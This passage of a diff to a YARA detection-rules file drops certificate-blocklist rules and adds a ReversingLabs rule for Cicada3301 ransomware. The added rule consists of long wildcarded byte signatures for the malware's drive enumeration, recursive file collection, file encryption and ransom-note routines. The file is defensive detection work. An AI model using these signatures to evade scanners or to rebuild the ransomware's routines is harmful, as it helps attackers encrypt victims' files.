+            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B
+            45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2
+            F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ??
+            ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3
+        }
+		$drop_ransom_note = {
+            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cicada3301 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cicada3301 ransomware."
 		author = "ReversingLabs"
-		id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c1a60870-0b68-5f2f-a74f-34e493a5e251"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3062-L3080"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cicada3301.yara#L1-L309"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46"
+		logic_hash = "9479667fd4c7f865607ece6af985ab6fa7b62f98738c338e4155059551db8a21"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cicada3301"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FIRNEEZ EUROPE LIMITED" and ( pe.signatures [ i ] . serial == "00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or pe.signatures [ i ] . serial == "b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" ) and 1542931200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE
-{
+	strings:
+		$get_valid_drives = {
+            55 89 E5 53 57 56 83 EC ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 28 0D ?? ?? ?? ?? 0F 28 15 ?? ??
+            ?? ?? 89 C6 0F 11 00 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 28 15 ?? ?? ??
+            ?? 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 11 48 ?? C7 40 ?? ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 83 C0 ?? 8D 4D ?? 50 56 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 7D ?? ?? 0F
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B 5D ??
+            8D 04 7F 89 75 ?? 89 7D ?? 8D 74 83 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90 57 6A ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 4F ?? 39 D1 0F 83 ?? ?? ?? ?? 39 D0 0F
+            83 ?? ?? ?? ?? 8B 56 ?? 8D 04 40 89 CF 89 55 ?? F2 0F 10 06 F2 0F 11 45 ?? 8B 54 83
+            ?? F2 0F 10 04 83 F2 0F 11 06 89 56 ?? 83 C6 ?? 83 F9 ?? 8B 55 ?? 89 54 83 ?? F2 0F
+            10 45 ?? F2 0F 11 04 83 77 ?? 8B 45 ?? 8B 75 ?? FF 08 75 ?? FF 48 ?? 75 ?? 6A ?? 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 45 ?? F2 0F 10 45 ?? 89 47 ?? F2
+            0F 11 07 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 83 C4 ?? 5E 5F 5B 5D C3
+        }
+		$collect_files_recursively_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8B 75 ?? 8B 45 ?? 89
+            4C 24 ?? 89 44 24 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 84 C0 0F 84 ?? ?? ?? ??
+            8D 9C 24 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ??
+            8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            53 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B
+            5D ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 04 FB C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D B4 24 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 56 8D 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B BC 24 ?? ?? ?? ?? 8B 9C
+            24 ?? ?? ?? ?? 85 FF 89 FA 0F 44 D3 8D 8C 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 85 DB 74 ??
+            6A ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 7D
+            ?? 89 44 24 ?? 89 0C 24 EB ?? 66 90 83 C7 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 3B BC
+        }
+		$collect_files_recursively_p2 = {
+            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 77 ?? FF 37 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? FF 34 24 FF 74 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? FF 74 24
+            ?? 56 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? F2 0F 10 94 24 ?? ?? ??
+            ?? F2 0F 10 8C 24 ?? ?? ?? ?? 8B 5C 24 ?? 89 84 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ??
+            ?? ?? F2 0F 11 8C 24 ?? ?? ?? ?? F2 0F 11 94 24 ?? ?? ?? ?? FF 74 24 ?? 53 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 24 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B B4 24 ?? ?? ?? ?? 85 F6 74 ?? 8B 9C 24 ?? ?? ?? ?? 83 C3 ?? EB ?? 66 2E 0F
+            1F 84 00 ?? ?? ?? ?? 90 83 C3 ?? 4E 74 ?? 83 7B ?? ?? 72 ?? 8B 03 85 C0 74 ?? C1 E0
+            ?? 6A ?? 50 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90
+            8B 84 24 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C1 E0 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 5C 24 ?? 89 44 24 ?? 89 54 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F
+            85 ?? ?? ?? ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F
+            1F 44 00 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 75 ?? 8B 84
+            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? EB
+        }
+		$collect_files_recursively_p3 = {
+            8D 94 24 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 D7 89 DE F3 A5 8B 84 24
+            ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 77 ?? 8B 1F 8B 06 53 FF D0 83 C4 ?? 8B 46
+            ?? 85 C0 74 ?? FF 76 ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 7F ?? E9 ?? ?? ?? ?? 8B 74 24 ?? F0
+            FF 06 0F 8E ?? ?? ?? ?? 89 5C 24 ?? 89 74 24 ?? FF 75 ?? 8D BC 24 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 57 56 53 FF 75 ?? FF 75 ?? FF 74 24 ?? FF 74 24 ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ??
+            ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 DF 89 D6 F3 A5 53 E8 ?? ?? ?? ?? 83 C4 ?? 09 D0 0F 84
+            ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 74 ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 31 DB 83 7C 24 ?? ?? 75 ?? 8B
+            5C 24 ?? 8B 7C 24 ?? EB ?? 8B BC 24 ?? ?? ?? ?? 31 DB 85 DB B8 ?? ?? ?? ?? 89 BC 24
+            ?? ?? ?? ?? 0F 44 FB 0F 44 D8 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 7C 24 ?? ?? 8B 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 89 C8 83 F8 ?? 0F 82 ?? ??
+            ?? ?? 89 4C 24 ?? 8B 0E BA ?? ?? ?? ?? 31 D1 0F B6 56 ?? 83 F2 ?? 09 CA 0F 85 ?? ??
+            ?? ?? 83 C0 ?? 8D 4E ?? 50 51 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7C 24
+        }
+		$collect_files_recursively_p4 = {
+            0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 C1 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 51 89 4C 24 ?? E8 ??
+            ?? ?? ?? 8B 0C 24 89 44 24 ?? 51 E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 81 7C 24 ?? ??
+            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 8B 4C 24 ?? 8B 54 24 ?? B8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 45 C8 B8 ??
+            ?? ?? ?? 0F 45 D0 8D 84 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8D 44 24 ?? 89 54 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 89 44 24 ?? 8B 44 24
+            ?? 89 54 24 ?? 89 84 24 ?? ?? ?? ?? 89 C8 29 D0 BA ?? ?? ?? ?? 72 ?? 03 44 24 ?? FF
+            74 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B 54 24 ?? 85 C0 B8 ??
+            ?? ?? ?? 0F 45 D0 8B 84 24 ?? ?? ?? ?? 89 54 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ??
+            E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 83 C4 ?? 89 C8 29 D0 89 44 24 ?? 50 8B 44 24
+            ?? 50 51 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ??
+            3C ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 7C 24 ?? BE ?? ?? ?? ?? 39 04 24 74 ?? 85 FF
+            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85
+            C0 0F 84 ?? ?? ?? ?? 57 FF 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24
+            ?? 89 7C 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$collect_files_recursively_p5 = {
+            8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 74 24 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ??
+            ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 74 24 ?? 85 DB 89 44 24 ?? 89 0C 24 74 ?? 6A ??
+            53 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? EB ?? 31 C0 BE ?? ?? ?? ?? 83 F8 ?? 0F 83 ?? ?? ?? ?? 89 44
+            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 8B 44
+            24 ?? F2 0F 11 44 24 ?? 39 C7 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 75 ?? 57 FF 74 24 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 7C 24 ?? ?? 75 ?? 8B 06 8B 76 ?? B9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 31 C8 31 D6 09 C6 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 5C
+            24 ?? 8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00
+            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44
+        }
+		$collect_files_recursively_p6 = {
+            24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 2E 0F 1F 84 00 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 84 24 ?? ?? ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 31 FF BB ?? ?? ?? ?? 85 FF 0F 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 57 89 5C 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24 ?? 89 7C 24
+            ?? 6A ?? 57 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 74 24 ?? 66 C7 44
+            30 ?? ?? ?? C7 04 30 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? F2 0F 10 44 24 ?? 89 74 24 ?? 8B
+            08 8B 58 ?? F2 0F 11 44 24 ?? 8B 44 24 ?? 89 4C 24 ?? 29 F0 39 D8 73 ?? 53 56 8D 44
+            24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8B 44 24 ?? 01 F0 53 FF 74 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 01 DE 89 B4 24 ?? ?? ?? ?? F2 0F 11 84 24 ??
+            ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 56 53 57 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ?? 3C ?? 88 44 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7C 24 ?? 85
+            FF 0F 84 ?? ?? ?? ?? 8B 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 53 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
+            24 ?? 8B 4C 24 ?? 8B 5C 24 ?? 85 F6 89 44 24 ?? 89 4C 24 ?? 74 ?? 6A ?? 56 57 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 DB 74 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24
+        }
+		$encrypt_files_full_v1_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 54 24 ?? 89 4C 24 ?? 6A ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C7 89 44 24 ??
+            0F 85 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 47 ?? 89 44 24 ?? EB ?? 66 2E 0F
+            1F 84 00 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 01 DF 89 7E ?? 8B 7C 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 44 24 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ??
+            ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48 ?? F2
+            0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ?? F2 0F
+            11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ?? 75 ??
+            E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 0F B6 5C 24 ?? 0F B7
+            54 24 ?? 81 FE ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10
+            44 24 ?? 66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2
+            0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24
+            ?? F2 0F 11 44 24 ?? F3 0F 7E 44 24 ?? 89 41 ?? 66 0F D6 41 ?? C7 41 ?? ?? ?? ?? ??
+            C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
+            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 59 ?? 66 89 51 ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0 89 7C
+        }
+		$encrypt_files_full_v1_p2 = {
+            24 ?? 89 7C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ?? 8D 4C
+            24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? F3 0F 6F 64
+            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
+            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
